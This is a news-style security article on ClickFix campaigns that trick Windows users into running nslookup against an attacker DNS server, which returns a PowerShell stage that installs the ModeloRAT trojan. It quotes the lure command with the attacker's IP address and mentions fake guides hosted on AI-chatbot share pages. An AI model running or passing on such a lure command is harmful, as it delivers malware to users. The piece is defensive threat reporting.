Cybercriminals Now Abusing DNS Queries in ClickFix Attacks to Deliver Malware

In a startling evolution of cyber threats, attackers have found a new way to exploit the Domain Name System (DNS) to deliver malware through ClickFix social engineering campaigns. This marks the first known instance where DNS queries are being used as a channel for malicious payload delivery, adding a new layer of complexity to an already sophisticated attack vector.

What is ClickFix?

ClickFix attacks have become a notorious method for cybercriminals to trick unsuspecting users into executing malicious commands. These attacks typically masquerade as legitimate prompts, such as fixing errors, installing updates, or enabling functionality. Victims are often lured into manually running commands that appear harmless but are, in fact, designed to compromise their systems.

The New DNS-Based ClickFix Technique

In this latest campaign, observed by Microsoft Threat Intelligence, attackers have taken ClickFix to a whole new level. Instead of relying on traditional web-based payload delivery, they are now using DNS queries to deliver the second-stage payload. Here’s how it works:

1. The Lure: Victims are instructed to run the nslookup command in the Windows Run dialog box. This command queries an attacker-controlled DNS server instead of the system’s default DNS server.

2. The Payload Delivery: The DNS response contains a malicious PowerShell script embedded in the NAME: field of the query. This script is then executed on the victim’s device.

3. The Execution: The PowerShell script downloads additional malware from attacker-controlled infrastructure, ultimately leading to the installation of a remote access trojan (RAT) known as ModeloRAT.

How the Attack Unfolds

The attack begins with a seemingly innocuous command:

nslookup example.com 84.21.189.20

This command queries the attacker’s DNS server at 84.21.189.20 for the hostname example.com. The response from the server includes a malicious PowerShell script, which is then executed via the Windows command interpreter (cmd.exe).

The PowerShell script proceeds to download a ZIP archive containing a Python runtime executable and malicious scripts. These scripts perform reconnaissance on the infected device and domain, establish persistence by creating specific files and shortcuts, and ultimately deploy the ModeloRAT malware.

Why This Technique is Dangerous

This new approach is particularly concerning for several reasons:

• Evasion: By using DNS queries, attackers can blend their malicious activity with normal DNS traffic, making it harder to detect.
• Flexibility: Attackers can modify payloads on the fly by simply updating the DNS response, allowing for rapid adaptation to security measures.
• Persistence: The use of DNS as a communication channel provides a stealthy method for maintaining long-term access to compromised systems.

The Broader Context of ClickFix Attacks

ClickFix attacks have been rapidly evolving over the past year, with threat actors experimenting with new delivery tactics and payload types. Previously, these attacks relied on convincing users to execute PowerShell or shell commands directly on their operating systems. However, recent campaigns have expanded beyond traditional malware delivery.

For example, the “ConsentFix” attack abuses the Azure CLI OAuth app to hijack Microsoft accounts without requiring a password, bypassing multi-factor authentication (MFA). Additionally, attackers have begun using shared ChatGPT and Grok pages, as well as Claude Artifact pages, to promote fake guides for ClickFix attacks.

In a novel twist, a recent ClickFix campaign promoted through Pastebin comments tricked cryptocurrency users into executing malicious JavaScript directly in their browsers while visiting a cryptocurrency exchange. This campaign was designed to hijack transactions rather than deploy traditional malware.

Conclusion

The use of DNS queries in ClickFix attacks represents a significant escalation in the sophistication of cyber threats. By leveraging the ubiquity and trust associated with DNS, attackers have found a new way to deliver malware while evading detection. As these attacks continue to evolve, it is crucial for individuals and organizations to stay vigilant, keep their systems updated, and be cautious of unsolicited prompts or commands.

Tags and Viral Phrases

• DNS-based malware delivery
• ClickFix evolution
• Cybersecurity threats
• ModeloRAT remote access trojan
• Social engineering attacks
• Microsoft Defender insights
• DNS query exploitation
• Cybercriminal tactics
• Malware persistence techniques
• Emerging cyber threats
• Windows Run dialog abuse
• PowerShell script execution
• Attacker-controlled DNS servers
• Bypassing multi-factor authentication
• Cryptocurrency transaction hijacking
• Claude Artifact pages exploitation
• Azure CLI OAuth abuse
• Pastebin comments malware
• JavaScript execution in browsers
• Reconnaissance and persistence
• Stealthy malware delivery
• Cybersecurity awareness
• Threat intelligence updates
• Evolving attack vectors
• User vigilance required
• System security updates
• Detecting DNS anomalies
• Protecting against ClickFix
• Cybersecurity best practices
• Staying ahead of cybercriminals

,